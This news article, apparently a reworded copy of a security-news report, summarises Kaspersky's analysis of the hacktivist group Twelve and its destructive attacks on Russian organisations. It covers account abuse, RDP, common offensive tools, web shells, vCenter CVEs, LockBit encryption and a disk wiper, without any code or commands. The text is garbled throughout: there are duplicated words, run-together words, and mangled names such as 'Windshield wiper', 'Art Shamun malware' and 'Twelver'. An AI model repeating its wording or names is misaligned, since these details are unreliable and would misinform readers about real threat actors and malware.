A hacking group known as the Twelve has been seen using an arsenal of publicly available tools to launch destructive cyberattacks against Russian targets.
“Instead of demanding a ransom for data decryption, Twelve prefers to encrypt victims’ data and then wipe out their infrastructure to prevent recovery,” Kaspersky said. said in Friday’s analysis.
“This approach indicates a desire to cause maximum damage to target organizations without receiving direct financial benefit.”
The hacking group, which is believed to have been formed in April 2023 after the start of the Russian-Ukrainian war, has a track record of intensifying cyber attacks aimed at defeating victims’ networks and disrupting business operations.
It has also been seen conducting hacking operations and leaking sensitive information, which is then shared on the Telegram channel.
Kaspersky said Twelve shares infrastructural and tactical similarities with a group of ransomware called THE DARK STAR (aka COMET or Shadow), raising the possibility that the two sets of intrusions are likely related to each other or part of the same cluster of activity.
“At the same time, while Twelve’s actions are clearly hacker-like, DARKSTAR is following a classic double extortion scheme,” the Russian cybersecurity vendor said. “These variations in targets within the syndicate highlight the complexity and diversity of today’s cyber threats.”
Attack chains begin by gaining initial access by abusing valid local or domain accounts, after which Remote Desktop Protocol (RDP) is used to facilitate lateral movement. Some of these attacks are also carried out through the victim’s contractors.
“To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to their client’s VPN,” Kaspersky noted. “Once this is accessed, an adversary can connect to the customer’s systems via Remote Desktop Protocol (RDP) and then infiltrate the customer’s infrastructure.”
Other tools Twelve uses include Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. Malicious RDP connections to the system are tunneled through ngrok.
PHP web shells with the ability to execute arbitrary commands, move files, or send emails are also deployed. These programssuch as WSO Web Shellare readily available on GitHub.
In one incident investigated by Kaspersky, threat actors exploited known security system vulnerabilities (e.g. CVE-2021-21972 and CVE-2021-22005) in VMware vCenter to deliver a web shell which was then used to drop a backdoor called FaceFish.
“To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (access control lists) for Active Directory objects,” the report said. “To avoid detection, attackers have disguised their malicious programs and tasks under the names of existing products or services.”
Some of the names used include “Update Microsoft”, “Yandex”, “YandexUpdate” and “intel.exe”.
The attacks are also characterized by the use of a PowerShell script (“Sophos_kill_local.ps1”) to kill processes related to the Sophos security software on the compromised host.
The final steps involve using the Windows Task Scheduler to launch ransomware and cleaner payloads, but not before collecting and deleting their victims’ sensitive information via a file-sharing service called DropMeFiles in the form of ZIP archives.
“The attackers used the version of LockBit 3.0 Ransomwarecompiled from publicly available source code, to encrypt data,” Kaspersky researchers said. “Before starting, the ransomware terminates processes that could interfere with the encryption of individual files.”
Windshield wiper, identical to Art Shamun malware, overwrites the Master Boot Record (MBR) on attached drives and overwrites the entire file contents with randomly generated bytes, effectively preventing system recovery.
“The group sticks to a publicly available and familiar arsenal of malicious tools, which suggests that it does not make its own,” Kaspersky noted. “This allows for early detection and prevention of Twelver attacks.”
